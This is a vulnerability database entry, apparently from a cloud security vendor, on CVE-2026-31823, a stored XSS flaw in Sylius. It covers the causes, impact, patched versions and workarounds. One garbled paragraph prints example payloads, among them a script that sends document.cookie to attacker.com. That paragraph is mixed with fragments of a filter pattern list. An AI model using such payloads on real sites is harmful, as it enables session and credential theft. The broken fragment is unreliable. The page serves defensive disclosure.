
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-31823 is an authenticated stored cross-site scripting (XSS) vulnerability in the Sylius open-source eCommerce Framework built on Symfony. It affects multiple locations in both the shop frontend and admin panel where unsanitized entity names are rendered as raw HTML. Affected versions include 2.0.0–2.0.15, 2.1.0–2.1.11, and 2.2.0–2.2.2 (as well as legacy branches prior to 1.9.12, 1.10.16, 1.11.17, 1.12.23, 1.13.15, and 1.14.18). The vulnerability was published on March 9, 2026, and carries a CVSS v3.1 base score of 4.8 (Moderate) (GitHub Advisory, Sylius Advisory).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), manifesting in three distinct locations. First, the Twig breadcrumbs macro in shared/breadcrumbs.html.twig applies the |raw filter to label values derived from taxon names, product names, and ancestor names, allowing injected HTML/JavaScript to execute on the storefront. Second, ProductTaxonTreeController.js interpolates ${name} directly into an HTML template literal in its rowRenderer method without escaping. Third, Tom Select-based autocomplete fields in the admin panel render entity names as raw HTML in both dropdown items and options. An authenticated administrator with privileges to create or modify entity names (e.g., taxon names) can persistently inject malicious payloads that execute in the browsers of all subsequent users who view the affected pages (GitHub Advisory, Sylius Advisory).
Successful exploitation allows an authenticated administrator to persistently inject arbitrary HTML or JavaScript into pages viewed by all users of the storefront and admin panel. This can result in session hijacking, credential theft, unauthorized actions performed on behalf of victims, and exfiltration of sensitive data such as payment or personal information. The scope change in the CVSS score reflects that the injected script executes in the context of other users' browsers, extending impact beyond the attacker's own session (GitHub Advisory, Sylius Advisory).
There is no public proof-of-concept exploit and no evidence of in-the-wild exploitation at this time (Feedly). The vulnerability requires authenticated administrator-level access and victim user interaction (browsing an affected page), which limits opportunistic exploitation. The EPSS score is approximately 0.026–0.043%, placing it in the 14th percentile for exploitation likelihood. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Responsible disclosure was credited to Djibril Mounkoro (@whiteov3rflow) and Bartłomiej Nowiński (@bnBart) (Sylius Advisory).
<img src=x onerror=alert('XSS')> or a more sophisticated payload such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script>.<script>, <img>, onerror=, etc.).<script>, <img src=x onerror=, javascript:).Upgrade Sylius to a patched version: 2.0.16, 2.1.12, or 2.2.3 for currently supported branches; for legacy branches, upgrade to 1.9.12, 1.10.16, 1.11.17, 1.12.23, 1.13.15, or 1.14.18 (Sylius Advisory). If immediate upgrade is not possible, apply the following project-level overrides: (1) override templates/bundles/SyliusShopBundle/shared/breadcrumbs.html.twig to use {{ item.label }} instead of {{ item.label|raw }}; (2) override ProductTaxonTreeController.js to use an escapeHtml() function wrapping ${name}; (3) add an autocomplete-xss-protection.js script that wraps Tom Select renderers to escape entity names before rendering. Additionally, implement Content Security Policy (CSP) headers to reduce XSS impact, and restrict admin access to trusted personnel only (GitHub Advisory).
Sylius published an official security blog post and GitHub Security Advisory crediting researchers Djibril Mounkoro (@whiteov3rflow) and Bartłomiej Nowiński (@bnBart) for responsible disclosure (Sylius Blog, Sylius Advisory). No significant broader media coverage or notable community controversy has been observed beyond standard vulnerability tracking and aggregation sites.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."